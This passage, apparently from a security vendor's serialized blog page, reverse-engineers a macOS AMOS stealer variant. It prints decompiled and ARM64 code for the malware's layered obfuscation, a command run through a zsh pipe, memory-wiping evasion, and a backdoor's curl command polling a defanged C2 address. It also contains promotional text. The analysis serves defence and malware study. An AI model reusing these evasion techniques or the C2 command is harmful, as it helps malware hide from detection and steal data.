These 68,604 bytes then feed Layer 3.",[22,1244],{},[186,1246,1248],{"id":1247},"capa-3-alfabeto-de-nibbles-personalizado-de-16-símbolos","Layer 3: custom 16-symbol nibble alphabet",[12,1250,192],{},[12,1252,1253],{},"The 68,604 bytes output by Layer 2 use only 16 distinct byte values, drawn from two non-contiguous ASCII ranges:",[1255,1256,1257,1306],"ul",{},[1258,1259,1260,1263,1264,805,1267,805,1270,805,1273,805,1276,805,1279,805,1282,805,1285,805,1287,805,1290,805,1293,805,1296,805,1299,805,1301,805,1303],"li",{},[63,1261,1262],{},"0x20-0x2F",": space, ",[63,1265,1266],{},"!",[63,1268,1269],{},"\"",[63,1271,1272],{},"#",[63,1274,1275],{},"$",[63,1277,1278],{},"%",[63,1280,1281],{},"&",[63,1283,1284],{},"'",[63,1286,545],{},[63,1288,1289],{},")",[63,1291,1292],{},"*",[63,1294,1295],{},"+",[63,1297,1298],{},",",[63,1300,873],{},[63,1302,1014],{},[63,1304,1305],{},"/",[1258,1307,1308,1062,1311,805,1314,805,1317,805,1320,805,1323,805,1326,805,1329,1332],{},[63,1309,1310],{},"0x78-0x7F",[63,1312,1313],{},"x",[63,1315,1316],{},"y",[63,1318,1319],{},"z",[63,1321,1322],{},"{",[63,1324,1325],{},"|",[63,1327,1328],{},"}",[63,1330,1331],{},"~",", DEL",[12,1334,1335],{},"This is a deliberate choice. In a hex editor these bytes look like whitespace, punctuation and characters at the end of the ASCII range, so they blend in as if they were metadata or padding rather than encoded data. A human analyst doing a quick visual scan of a hex dump will not flag these byte ranges as suspicious. Standard entropy analysis will also underestimate the effective entropy because the byte distribution looks non-random.",[12,1337,1338,1339,1342,1343,1346,1347,1350,1351,1354],{},"Each byte of this alphabet encodes one nibble of the actual payload. 
The alphabet-to-nibble mapping is applied by the encoding and decoding function ",[63,1340,1341],{},"FUN_100000d60",", which we confirmed at ",[63,1344,1345],{},"0x100000d60",". It chains two subfunctions: ",[63,1348,1349],{},"FUN_100000b50"," builds an indexed map of the input string's characters, and ",[63,1352,1353],{},"FUN_100000c34"," walks this map consuming 6 bits per step and accumulating 8-bit output bytes:",[52,1356,1357],{"style":54},[524,1358,1359,1362,1363,1365,1366,1368,1369,1371,1372,1375,1376,420,1379,1381,1382,1384,1385,424,1388,1390,1391,1394,1395,1397,1398,424,1401,1403,1404,1407,1408,1411,1412,1414,1415,1418,1419,1421,1422,578,1425,1427,1428,1430,1431,1433],{},[102,1360,1361],{"style":528},"// FUN_100000c34 @ 0x100000c34, nibble accumulator","\niVar5 = ",[102,1364,808],{"style":564},";\n",[102,1367,828],{"style":538}," {\n  local_52 = *(",[102,1370,1053],{"style":538}," *)puVar4;\n  lVar3 = ",[102,1373,1374],{"style":543},"FUN_1000a078c","(param_3, &local_52);  ",[102,1377,1378],{"style":528},"// look up nibble value",[102,1380,835],{"style":538}," (lVar3 == ",[102,1383,808],{"style":564},") {\n    ",[102,1386,1387],{"style":528},"// character not in alphabet, treat as raw",[102,1389,1374],{"style":543},"(param_3, &local_51);\n  } ",[102,1392,1393],{"style":538},"else"," {\n    iVar5 = iVar5 + ",[102,1396,585],{"style":564},";           ",[102,1399,1400],{"style":528},"// accumulate 4 bits",[102,1402,912],{"style":538}," (",[102,1405,1406],{"style":564},"7"," \u003C iVar5) {\n      std::string::",[102,1409,1410],{"style":543},"push_back","((",[102,1413,843],{"style":538},")param_1);  ",[102,1416,1417],{"style":528},"// emit byte when 8+ bits ready","\n      iVar5 = iVar5 + -",[102,1420,824],{"style":564},";\n    }\n  }\n  puVar4 = (",[102,1423,1424],{"style":538},"undefined8",[102,1426,756],{"style":538},")puVar4 + ",[102,1429,839],{"style":564},");\n} ",[102,1432,912],{"style":538}," (puVar4 != puVar1);\n",[12,1435,1436],{},"The 
34,302 bytes that emerge from this pass are 99.7% printable ASCII; at this stage the payload looks, on a superficial inspection, like a long shell script or a configuration blob.",[22,1438],{},[186,1440,1442],{"id":1441},"capa-4-ofuscación-de-cadenas-en-tiempo-de-compilación","Layer 4: compile-time string obfuscation",[12,1444,192],{},[12,1446,1447],{},"Short internal-use strings are obfuscated at compile time using the same triplet scheme as Layer 1. These strings are reconstructed at runtime immediately before use and never persist in memory: they are consumed by the next operation and the buffer is freed afterwards. At no point is a decoded string visible in the binary's static data sections.",[12,1449,1450,1451,1454],{},"The string hash function ",[63,1452,1453],{},"FUN_100000730"," provides a secondary obfuscation layer for string comparisons. Instead of comparing strings directly, which would leave plaintext in memory open to pattern matching, the binary computes and compares integer hashes:",[52,1456,1457],{"style":54},[524,1458,1459,1462,1465,540,1467,545,1469,757,1471,1473,1474,1477,1478,420,1481,420,1484,1487,1488,1490,1491,1493,1494,1496,1497,1115,1500,1503,1504,1506,1507,1509],{},[102,1460,1461],{"style":528},"// FUN_100000730 @ 0x100000730",[102,1463,1464],{"style":528},"// FNV-style string hash, avoids plaintext string comparisons",[102,1466,551],{"style":538},[102,1468,1453],{"style":543},[102,1470,843],{"style":538},[102,1472,551],{"style":538}," iVar4 = ",[102,1475,1476],{"style":564},"0x19a8",";    ",[102,1479,1480],{"style":528},"// FNV offset basis (modified)",[102,1482,1483],{"style":528},"// ...",[102,1485,1486],{"style":538},"for"," (; uVar3 != ",[102,1489,808],{"style":564},"; uVar3 = uVar3 - ",[102,1492,839],{"style":564},") {\n    iVar4 = (",[102,1495,551],{"style":538},")*pcVar1 + 
iVar4 * -",[102,1498,1499],{"style":564},"0x7fb91be3",[102,1501,1502],{"style":528},"// FNV-1a style multiply","\n    pcVar1 = pcVar1 + ",[102,1505,839],{"style":564},";\n  }\n  ",[102,1508,593],{"style":538}," iVar4;\n}\n",[12,1511,1512],{},"The ARM64 implementation replaces the multiplication with a fused multiply-add:",[52,1514,1515],{"style":54},[56,1516,1519],{"className":1517,"code":1518,"language":61},[59],"100000744:  mov w0,#0x19a8            ; FNV basis\n100000750:  mov w10,#0xe41d\n100000754:  movk w10,#0x8046, LSL #16 ; constant = 0x8046e41d = -0x7fb91be3\n100000758:  ldrsb w11,[x8], #0x1      ; load char, post-increment\n10000075c:  madd w0,w0,w10,w11        ; w0 = w0 * 0x8046e41d + char\n100000760:  subs x9,x9,#0x1\n100000764:  b.ne 0x100000758\n",[63,1520,1518],{"__ignoreMap":65},[12,1522,1523],{},"This means that even comparing two strings inside the binary never produces a branch that a debugger can cleanly intercept at the string level, only at the hash level.",[22,1525],{},[186,1527,1529],{"id":1528},"capa-5-cifrado-de-flujo-personalizado-con-doble-instancia","Layer 5: custom stream cipher with two instances",[12,1531,192],{},[12,1533,1534,1535,1538],{},"This is where the obfuscation architecture becomes genuinely unusual. There is not one but ",[251,1536,1537],{},"two separate cipher instances"," in the binary, each with a different hard-coded lookup table and a different start counter. 
Both use the same algorithm structure but produce different output alphabets for different parts of the payload pipeline.",[12,1540,1541,1544,1545,718,1548,1551],{},[251,1542,1543],{},"Instance A"," — ",[63,1546,1547],{},"FUN_10007ab34",[63,1549,1550],{},"0x10007ab34",":",[52,1553,1554],{"style":54},[524,1555,1556,1559,1560,1365,1563,1565,1566,578,1568,1570,1571,1573,1574,578,1576,1578,1579,1581,1582,578,1584,1586,1587,1589,1590,1593,1594,1596,1597,1599],{},[102,1557,1558],{"style":528},"// Instance A, start counter 0x4c, table @ 0x100496f8b","\nuVar6 = ",[102,1561,1562],{"style":564},"0x4c",[102,1564,828],{"style":538}," {\n  bVar2 = *(",[102,1567,1215],{"style":538},[102,1569,756],{"style":538},")local_e0 +\n          ((",[102,1572,581],{"style":538},")(*(",[102,1575,1215],{"style":538},[102,1577,756],{"style":538},")local_c8 + uVar5) ^ uVar6) & ",[102,1580,1224],{"style":564},"));\n  *(",[102,1583,1215],{"style":538},[102,1585,756],{"style":538},")plVar1 + uVar5) = bVar2;\n  uVar6 = (",[102,1588,551],{"style":538},")uVar5 + (uVar6 ^ bVar2);  ",[102,1591,1592],{"style":528},"// counter: i + (counter XOR output)","\n  uVar5 = uVar5 + ",[102,1595,839],{"style":564},";\n} ",[102,1598,912],{"style":538}," (uVar7 != uVar5);\n",[12,1601,1602,1544,1605,718,1608,1551],{},[251,1603,1604],{},"Instance B",[63,1606,1607],{},"FUN_10007a7e0",[63,1609,1610],{},"0x10007a7e0",[52,1612,1613],{"style":54},[524,1614,1615,1559,1618,1365,1621,1565,1623,578,1625,1627,1628,1573,1630,578,1632,1634,1635,1581,1637,578,1639,1586,1641,1589,1643,1593,1646,1596,1648,1599],{},[102,1616,1617],{"style":528},"// Instance B, start counter 0x9f, different table @ 0x100496e0a region",[102,1619,1620],{"style":564},"0x9f",[102,1622,828],{"style":538},[102,1624,1215],{"style":538},[102,1626,756],{"style":538},")local_c0 +\n          ((",[102,1629,581],{"style":538},[102,1631,1215],{"style":538},[102,1633,756],{"style":538},")local_a8 + uVar5) ^ uVar6) & 
",[102,1636,1224],{"style":564},[102,1638,1215],{"style":538},[102,1640,756],{"style":538},[102,1642,551],{"style":538},[102,1644,1645],{"style":528},"// identical counter update formula",[102,1647,839],{"style":564},[102,1649,912],{"style":538},[12,1651,1652,1653,1655,1656,1658],{},"The algorithm is structurally identical, but the start counter differs (",[63,1654,1562],{}," versus ",[63,1657,1620],{},") and the lookup tables live at different memory addresses. Instance A is invoked from state 11 of the state machine to produce the encoding alphabet for the first payload path. Instance B is invoked from state 6 to produce the decoding alphabet for the long shell script payload.",[12,1660,1661,1662,1665,1666,1669,1670,1673],{},"To be precise about what this cipher is: it is a ",[251,1663,1664],{},"substitution cipher with a counter-dependent index",". Each output byte is a table lookup whose index is ",[63,1667,1668],{},"(input_byte XOR counter) & 0xFF",". The counter is updated as ",[63,1671,1672],{},"counter = (i + (counter XOR output)) & 0xFF"," after each byte, meaning every output byte feeds back into the choice of the next lookup index. This creates a dependency chain across the entire output sequence: byte N cannot be decrypted without having correctly decrypted bytes 0 through N-1. This property makes partial decryption or fault analysis significantly harder.",[12,1675,1676],{},"Neither instance is standard RC4. There is no S-box initialisation phase and no S-box swap operation. 
The lookup tables are precomputed static constants embedded in the binary at compile time.",[22,1678],{},[186,1680,1682],{"id":1681},"capa-6-xor-en-tiempo-de-ejecución-con-clave-dependiente-del-código-de-salida","Layer 6: runtime XOR with an exit-code-dependent key",[12,1684,192],{},[12,1686,1687,1688,1691],{},"The final and analytically hardest layer applies an in-memory XOR transformation to the Stage 2 payload. The XOR key is not hard-coded in the binary. It is computed at runtime from the exit code of the ",[251,1689,1690],{},"first execution of the shell payload",", which means it cannot be determined by any kind of static analysis. The binary must actually run, the first shell script must run to completion, and only then does the key exist.",[12,1693,1694],{},"The key derivation sequence in the ARM64 state machine dispatcher:",[52,1696,1697],{"style":54},[56,1698,1701],{"className":1699,"code":1700,"language":61},[59],"; After shell_exec_via_pipe #1 returns, exit code is in w0\n10009f838:  ubfx w8,w0,#0x8,#0x8     ; extract bits [15:8] of exit status\n10009f83c:  mov w9,#0x7f0             ; multiplier constant\n10009f840:  madd w8,w8,w9,w26         ; key = (exit_byte × 0x7f0) + base_counter\n10009f844:  and w24,w8,#0xffff        ; mask to 16-bit key → stored in w24\n",[63,1702,1700],{"__ignoreMap":65},[12,1704,1705],{},"The XOR loop that processes the Stage 2 payload:",[52,1707,1708],{"style":54},[56,1709,1712],{"className":1710,"code":1711,"language":61},[59],"; In-place XOR, every byte of the payload is XORed with w24\n10009fc34:  ldrb w10,[x8, x9, LSL ]  ; load payload byte\n10009fc48:  eor w10,w10,w24          ; XOR with key\n10009fc4c:  strb w10,[x8, x9, LSL ]  ; write decrypted byte in place\n",[63,1713,1711],{"__ignoreMap":65},[12,1715,1716,1717,1720,1721,1724,1725,1727],{},"The key is a 16-bit value 
derived from the exit status byte of the first shell payload, multiplied by ",[63,1718,1719],{},"0x7f0"," and added to the current value of the state machine's base counter register ",[63,1722,1723],{},"w26",". The multiplicative constant ",[63,1726,1719],{}," means that even a single-bit difference in the exit code produces a completely different key: there is no exploitable continuity between adjacent key values.",[12,1729,1730],{},"Without running the binary in a controlled environment and capturing the exact exit code of the first shell payload, the Stage 2 payload remains permanently opaque to static analysis. This was the hardest barrier we encountered in the entire analysis.",[22,1732],{},[41,1734,1736],{"id":1735},"ejecución-de-shell-pipes-en-lugar-de-argumentos-y-xor-simd","Shell execution: pipes instead of arguments, and SIMD XOR",[12,1738,47],{},[12,1740,1741,1742,718,1745,1748],{},"The shell execution function ",[63,1743,1744],{},"FUN_10000091c",[63,1746,1747],{},"0x10000091c"," is the architecturally most interesting piece of the binary. It is where everything converges: the decoded payload, the obfuscated command name and the deliberate anti-forensic design. Every individual design decision in this function is intentional and serves a specific evasion purpose.",[186,1750,1752],{"id":1751},"paso-1-el-nombre-del-comando-nunca-está-en-texto-plano","Step 1: the command name is never in plaintext",[12,1754,192],{},[12,1756,1757,1758,1761,1762,718,1765,1768,1769,1772],{},"The ",[63,1759,1760],{},"/bin/zsh"," string does not exist anywhere in the binary. It is stored in section ",[63,1763,1764],{},"__cstring",[63,1766,1767],{},"0x1007bb5c8"," as the obfuscated bytes ",[63,1770,1771],{},"\\x01LG@\\x01T]F",". 
Decoding happens at runtime through a single XOR operation, confirmed directly in the ARM64 assembly:",[52,1774,1775],{"style":54},[56,1776,1779],{"className":1777,"code":1778,"language":61},[59],"; FUN_10000091c — command name decode via SIMD XOR\n100000960:  adrp x8,0x1007bb000\n100000964:  add x8,x8,#0x5c8          ; x8 → \"\\x01LG@\\x01T]F\" in __cstring\n100000968:  ldr x8,[x8]               ; load 8 obfuscated bytes as uint64\n10000096c:  str x8,[sp, #0x20]\n100000970:  strb wzr,[sp, #0x28]      ; null terminator\n\n100000974:  ldr d0,[sp, #0x20]        ; load into SIMD register d0\n100000978:  movi v1.8B,#0x2e          ; broadcast 0x2e to all 8 lanes of v1\n10000097c:  eor v0.8B,v0.8B,v1.8B    ; XOR all 8 bytes simultaneously\n100000980:  str d0,[sp, #0x20]        ; store decoded \"/bin/zsh\"\n\n100000988:  mov w8,#0x732d            ; 0x732d = \"-s\" (little-endian)\n10000098c:  strh w8,[sp, #0x4]        ; store argument string\n",[63,1780,1778],{"__ignoreMap":65},[12,1782,1783,1784,1787,1788,1790,1791,1794],{},"The XOR key is ",[63,1785,1786],{},"0x2e",", the ASCII value of ",[63,1789,1014],{}," (period). The decoding is done in a single ",[63,1792,1793],{},"eor v0.8B, v0.8B, v1.8B",", an ARM64 NEON vector instruction that XORs all 8 bytes of the string simultaneously. 
Using a SIMD instruction for a simple 8-byte decode is unusual and serves two purposes: it is faster than a byte-by-byte loop, and it generates a fundamentally different instruction pattern that signature-matching tools trained on scalar decoding loops will not detect.",[12,1796,1797,1798,805,1801,805,1804,805,1807,1810,1811,1814],{},"Verification is trivial: ",[63,1799,1800],{},"0x01 XOR 0x2e = 0x2f = /",[63,1802,1803],{},"0x4c XOR 0x2e = 0x62 = b",[63,1805,1806],{},"0x47 XOR 0x2e = 0x69 = i",[63,1808,1809],{},"0x40 XOR 0x2e = 0x6e = n",", which yields ",[63,1812,1813],{},"/bin"," in the first four bytes.",[186,1816,1818],{"id":1817},"paso-2-la-arquitectura-de-pipes","Step 2: the pipe architecture",[12,1820,192],{},[12,1822,1823],{},"After decoding the command name, the function creates an operating system pipe and forks:",[52,1825,1826],{"style":54},[56,1827,1830],{"className":1828,"code":1829,"language":61},[59],"100000990:  bl 0x1000a0f6c    ; _fork()\n100000994:  mov x20,x0        ; save PID\n100000998:  cbz w0,0x100000b00 ; if child: jump to exec path\n",[63,1831,1829],{"__ignoreMap":65},[12,1833,1834],{},"In the child process:",[52,1836,1837],{"style":54},[56,1838,1841],{"className":1839,"code":1840,"language":61},[59],"; Child process path\n100000b0c:  mov w1,#0x0\n100000b10:  bl 0x1000a0f48    ; _dup2(pipe_read_fd, STDIN=0)\n; pipe read-end is now stdin, shell reads from pipe\n100000b2c:  add x0,sp,#0x20   ; argv[0] = \"/bin/zsh\"\n100000b30:  add x1,sp,#0x8    ; argv array\n100000b34:  bl 0x1000a0f60    ; _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n",[63,1842,1840],{"__ignoreMap":65},[12,1844,1845,1846,1849,1850,1853,1854,1856],{},"The child process replaces its standard input with the read end of the pipe and then executes ",[63,1847,1848],{},"/bin/zsh -s",". The shell in ",[63,1851,1852],{},"-s"," mode reads commands from stdin. 
From the point of view of process monitoring, this process appears as ",[63,1855,1848],{}," with no arguments, which is indistinguishable from a legitimate interactive shell session.",[186,1858,1860],{"id":1859},"paso-3-escrituras-en-fragmentos-de-tamaño-variable","Step 3: variable-size chunked writes",[12,1862,192],{},[12,1864,1865],{},"The parent process writes the decrypted payload to the write end of the p
ipe in deliberately variable-sized chunks:",[52,1867,1868],{"style":54},[56,1869,1872],{"className":1870,"code":1871,"language":61},[59],"; Parent: compute chunk size then write\n1000009d4:  umulh x8,x23,x24       ; high-half multiply for modulo\n1000009d8:  lsr x8,x8,#0x7\n1000009dc:  msub x8,x8,x25,x23     ; x8 = length % 0xc0\n1000009e0:  add x8,x8,#0x40        ; chunk = (length % 192) + 64\n                                    ; range: 64 to 255 bytes per write\n1000009e4:  cmp x8,x23             ; clamp to remaining length\n1000009e8:  csel x2,x8,x23,cc\n\n1000009ec:  ldr w0,[sp, #0x34]     ; pipe write fd\n1000009f0:  mov x1,x21             ; payload pointer\n1000009f4:  bl 0x1000a0fc0         ; _write(fd, buf, chunk_size)\n\n100000a04:  mov w0,#0x1\n100000a08:  bl 0x1000a0fa8         ; _usleep(1), 1µs between chunks\n100000a0c:  add x21,x21,x22        ; advance pointer\n100000a10:  sub x23,x23,x22        ; reduce remaining count\n100000a14:  cbnz x23,0x1000009d4   ; loop until done\n",[63,1873,1871],{"__ignoreMap":65},[12,1875,1876,1877,1880,1881,1884,1885,1888,1889,1014],{},"The chunk size formula ",[63,1878,1879],{},"(remaining_length % 192) + 64"," produces values between 64 and 255 bytes per write call, varying with the remaining payload length. 
This variable chunking approach means that the write pattern, visible in kernel event tracing tools such as ",[63,1882,1883],{},"ktrace"," or ",[63,1886,1887],{},"dtrace",", does not produce a recognisable fixed-size signature. Each execution of the same payload produces a different sequence of call sizes for ",[63,1890,1891],{},"write()",[12,1893,1757,1894,1896],{},[63,1895,600],{}," of 1 microsecond between chunks serves a secondary purpose: it yields the CPU between writes, keeping the process's CPU usage flat and avoiding a sudden spike that a behavioural EDR rule might flag as anomalous burst I/O.",[186,1898,1900],{"id":1899},"paso-4-borrado-inmediato-de-memoria","Step 4: immediate memory wipe",[12,1902,192],{},[52,1904,1905],{"style":54},[56,1906,1909],{"className":1907,"code":1908,"language":61},[59],"; After all chunks written and pipe closed:\n100000a20:  ldrb w8,[x19, #0x17]   ; check string storage type\n100000a24:  sxtb w9,w8\n100000a28:  ldp x10,x11,[x19]\n100000a30:  csel x0,x10,x19,lt     ; pointer to payload buffer\n100000a34:  csel x1,x11,x8,lt      ; length of buffer\n100000a38:  bl 0x1000a0f30         ; _bzero(payload_buf, length)\n",[63,1910,1908],{"__ignoreMap":65},[12,1912,1913,1914,1917],{},"The ",[63,1915,1916],{},"_bzero()"," call zeroes the entire decrypted payload buffer immediately after the last byte has been written to the pipe. There is no moment, not even a microsecond, in which the decrypted payload remains in memory once execution has completed. A live memory dump taken the instant after this function returns will find only zeros where the payload was.",[12,1919,1920,1921,1924],{},"This technique is called ",[251,1922,1923],{},"zero-after-use"," and is the same one used by high-assurance cryptographic libraries to prevent secret key material from persisting in memory. 
Seeing it in general-purpose malware is unusual and points to a developer with a security engineering background.",[186,1926,1928],{"id":1927},"la-secuencia-de-ejecución-completa","The complete execution sequence:",[12,1930,192],{},[52,1932,1933],{"style":54},[56,1934,1937],{"className":1935,"code":1936,"language":61},[59],"__cstring:  \"\\x01LG@\\x01T]F\"   (7 bytes, obfuscated)\n    ↓  SIMD XOR with 0x2e (8-wide vector)\nstack:      \"/bin/zsh\\0\"         (decoded in-place, stack only)\n    ↓  _pipe() creates fd pair [read=local_60, write=local_5c]\n    ↓  _fork()\n    │\n    ├─ CHILD:  _dup2(local_60, 0)   stdin = pipe read end\n    │          _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n    │          → /bin/zsh reads commands from stdin (= pipe)\n    │\n    └─ PARENT: loop: _write(local_5c, payload, variable_chunk)\n                     _usleep(1)\n               _close(local_5c)    close write end → EOF to shell\n               _bzero(payload, len) ← WIPE IMMEDIATELY\n               _waitpid(child, ...)\n",[63,1938,1936],{"__ignoreMap":65},[41,1940,1942],{"id":1941},"la-tabla-de-importaciones-como-arma","The import table as a weapon",[12,1944,47],{},[12,1946,1947],{},"The complete import table of this binary is:",[52,1949,1950],{"style":54},[56,1951,1954],{"className":1952,"code":1953,"language":61},[59],"// C runtime / memory\n_memcpy       _memmove      _memset       _bzero\n\n// Process execution\n_fork         _execvp       _execl        __exit\n\n// IPC / pipes\n_pipe         _dup2         _close        _write\n\n// Synchronisation\n_waitpid      _usleep\n\n// Stack protection\n___stack_chk_fail    ___stack_chk_guard\n\n// C++ runtime\noperator.new    operator.delete    __Unwind_Resume\n___cxa_allocate_exception    ___cxa_throw    ___cxa_begin_catch\n___cxa_end_catch    ___cxa_free_exception    ___gxx_personality_v0\nterminate    logic_error    bad_array_new_length    __next_prime\n\n// STL containers\nappend    reserve    
push_back    operator=\n\n// Dynamic linking\ndyld_stub_binder\n",[63,1955,1953],{"__ignoreMap":65},[12,1957,1958],{},"The total import count is 27 symbols. What is missing is as significant as what is present.",[186,1960,1962],{"id":1961},"ausente-red","Absent: networking",[12,1964,192],{},[52,1966,1967],{"style":54},[56,1968,1971],{"className":1969,"code":1970,"language":61},[59],"socket      connect     bind        listen\naccept      send        recv        sendto\nrecvfrom    getaddrinfo gethostbyname\n",[63,1972,1970],{"__ignoreMap":65},[186,1974,1976],{"id":1975},"ausente-sistema-de-archivos","Absent: file system",[12,1978,192],{},[52,1980,1981],{"style":54},[56,1982,1985],{"className":1983,"code":1984,"language":61},[59],"open        read        fopen       fread\nfwrite      fclose      stat        unlink\nmkdir       rename      opendir     readdir\n",[63,1986,1984],{"__ignoreMap":65},[186,1988,1990],{"id":1989},"ausente-introspección-de-procesos","Absent: process introspection",[12,1992,192],{},[52,1994,1995],{"style":54},[56,1996,1999],{"className":1997,"code":1998,"language":61},[59],"getpid      getuid      getenv      sysctl\n",[63,2000,1998],{"__ignoreMap":65},[186,2002,2004],{"id":2003},"ausente-criptografía","Absent: cryptography",[12,2006,47],{},[52,2008,2009],{"style":54},[56,2010,2013],{"className":2011,"code":2012,"language":61},[59],"CCCrypt     SecItemAdd  SecKeychainFind\n",[63,2014,2012],{"__ignoreMap":65},[12,2016,2017,2018,805,2021,2024,2025,805,2028,2031,2032,2035],{},"In a traditional malware sample, one expects imports for networking (",[63,2019,2020],{},"socket",[63,2022,2023],{},"connect",") or file manipulation (",[63,2026,2027],{},"fopen",[63,2029,2030],{},"write","). This binary has ",[251,2033,2034],{},"none",". To a standard scanner, this binary looks like a harmless process launcher. 
This is a deliberate architectural decision to evade static analysis tools that flag suspicious API usage.",[12,2037,2038,2040],{},[63,2039,402],{}," does not perform the theft itself. Its sole purpose is to drop and execute the actual malicious payload: a heavily obfuscated AppleScript. A standalone EDR or AV looking for \"malicious binaries\" will see a loader with no networking or file I/O capabilities and may well hand it a \"clean\" verdict. It will miss that the binary is a specialised delivery system for a high-level script payload.",[22,2042],{},[25,2044,2046],{"id":2045},"la-puerta-trasera","The backdoor",[12,2048,31],{},[12,2050,2051,2052,2055],{},"The incident did not end with the initial compromise. Microsoft Defender telemetry showed a process running from ",[63,2053,2054],{},"/Users/\u003Credacted>/.mainhelper",", periodically polling an external server:",[52,2057,2058],{"style":54},[56,2059,2061],{"className":262,"code":2060,"language":264,"meta":65,"style":65},"sh -c \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[63,2062,2063],{"__ignoreMap":65},[102,2064,2065,2068,2070],{"class":104,"line":105},[102,2066,2067],{"class":271},"sh",[102,2069,276],{"class":275},[102,2071,2072],{"class":289}," \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[12,2074,2075],{},"The Base64 string decodes to a 16-byte device UUID, the unique identifier assigned to this machine by the attacker's C2 infrastructure on the day of the initial infection.",[12,2077,2078,2081,2082,2085,2086,2088],{},[63,2079,2080],{},".mainhelper"," (SHA-256: ",[63,2083,2084],{},"7c6766e2b05dfbb286a1ba48ff3e766d4507254e217e8cb77343569153d63063",") had been installed by the osascript dropper via ",[63,2087,272],{}," on the day of the 
incident.",[22,2090],{},[25,2092,2094],{"id":2093},"el-poder-del-escudo-colectivo-nuestra-plataforma-exclusiva-de-shared-threat-intelligence","The power of the collective shield: our exclusive Shared Threat Intelligence platform",[12,2096,31],{},[12,2098,2099],{},"When an alert fires in our SOC, the clock starts not only for the affected customer but for every organisation under the glueckkanja shield. This investigation into an undocumented AMOS variant highlights the critical nature of the intelligence gap: that dangerous window in which traditional vendors are blind because they have not yet seen the threat.",[12,2101,2102],{},"This is where our Shared Threat Intelligence platform, developed exclusively for our glueckkanja CSOC customers, proves its decisive value. We do not wait for industry updates; we create them. While our analysts were still dismantling the last layers of the ARM64 assembly, our Automated Orchestration Engine was already distributing the extracted indicators across our entire ecosystem. This creates an immediate herd-immunity effect, where a discovery on a single endpoint becomes a blocked threat for every organisation we protect within minutes.",[12,2104,2105],{},"Reactive security is a relic of the past when facing threats designed to slip through the cracks of conventional defences. The answer lies in combining human expertise with an architecture capable of deploying that knowledge instantly and at scale. 
When these insights are channelled through our shared intelligence model, the attacker's time advantage can be turned into a disadvantage, protecting our customers even before the industry has recognised the threat.",[22,2107],{},[2109,2110,2111,2116,2119,2122],"blockquote",{},[12,2112,2113],{},[251,2114,2115],{},"Data privacy note",[12,2117,2118],{},"Identifying information has been anonymised in this publication. Specific technical details, indicators and timestamps may have been slightly altered to ensure the continued protection of the affected environment while preserving the full technical integrity of the analysis.",[12,2120,2121],{},"The technical analysis and indicators of compromise (IOCs) included in this report are for illustrative and educational purposes only. This information is provided \"as is\". glueckkanja AG makes no warranties, express or implied, as to the completeness or accuracy of the data and accepts no liability for damages, losses or security incidents arising from the use or implementation of the information, rules or signatures shared here. 
Users are strongly encouraged to validate all indicators and rules in a controlled environment before deployment.",[12,2123,2124],{},"The indicators and techniques described may overlap with known malware families and are not exclusive to a single campaign.",[2126,2127,2128],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sVt8B, html code.shiki 
.sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}",{"title":65,"searchDepth":111,"depth":111,"links":2130},[2131,2132,2133,2134,2141,2142,2143,2144,2152,2159],{"id":43,"depth":111,"text":44},{"id":85,"depth":111,"text":86},{"id":146,"depth":111,"text":147},{"id":178,"depth":111,"text":179,"children":2135},[2136,2137,2138,2139,2140],{"id":188,"depth":329,"text":189},{"id":203,"depth":329,"text":204},{"id":217,"depth":329,"text":218},{"id":226,"depth":329,"text":227},{"id":243,"depth":329,"text":244},{"id":409,"depth":111,"text":410},{"id":499,"depth":111,"text":500},{"id":615,"depth":111,"text":616},{"id":686,"depth":111,"text":687,"children":2145},[2146,2147,2148,2149,2150,2151],{"id":701,"depth":329,"text":702},{"id":993,"depth":329,"text":994},{"id":1247,"depth":329,"text":1248},{"id":1441,"depth":329,"text":1442},{"id":1528,"depth":329,"text":1529},{"id":1681,"depth":329,"text":1682},{"id":1735,"depth":111,"text":1736,"children":2153},[2154,2155,2156,2157,2158],{"id":1751,"depth":329,"text":1752},{"id":1817,"depth":329,"text":1818},{"id":1859,"depth":329,"text":1860},{"id":1899,"depth":329,"text":1900},{"id":1927,"depth":329,"text":1928},{"id":1941,"depth":111,"text":1942,"children":2160},[2161,2162,2163,2164],{"id":1961,"depth":329,"text":1962},{"id":1975,"depth":329,"text":1976},{"id":1989,"depth":329,"text":1990},{"id":2003,"depth":329,"text":2004},null,"md",false,"post",{"lang":2170,"seoTitle":2171,"titleClass":2172,"date":2173,"categories":2174,"blogtitlepic":2176,"socialimg":2177,"customExcerpt":2178,"keywords":2179,"maxContent":2180,"asideNav":2181,"footer":2197,"contactInContent":2198,"published":2180,"hreflang":2255},"es","Variante AMOS Stealer: Ingeniería inversa de un malware macOS desconocido — Del incidente a la inteligencia","h2-font-size","2026-04-10",[2175],"Security","head-amos-stealer.png","/blog/heads/head-amos-stealer.png","Una variante de AMOS stealer no documentada previamente comprometió un endpoint macOS. 
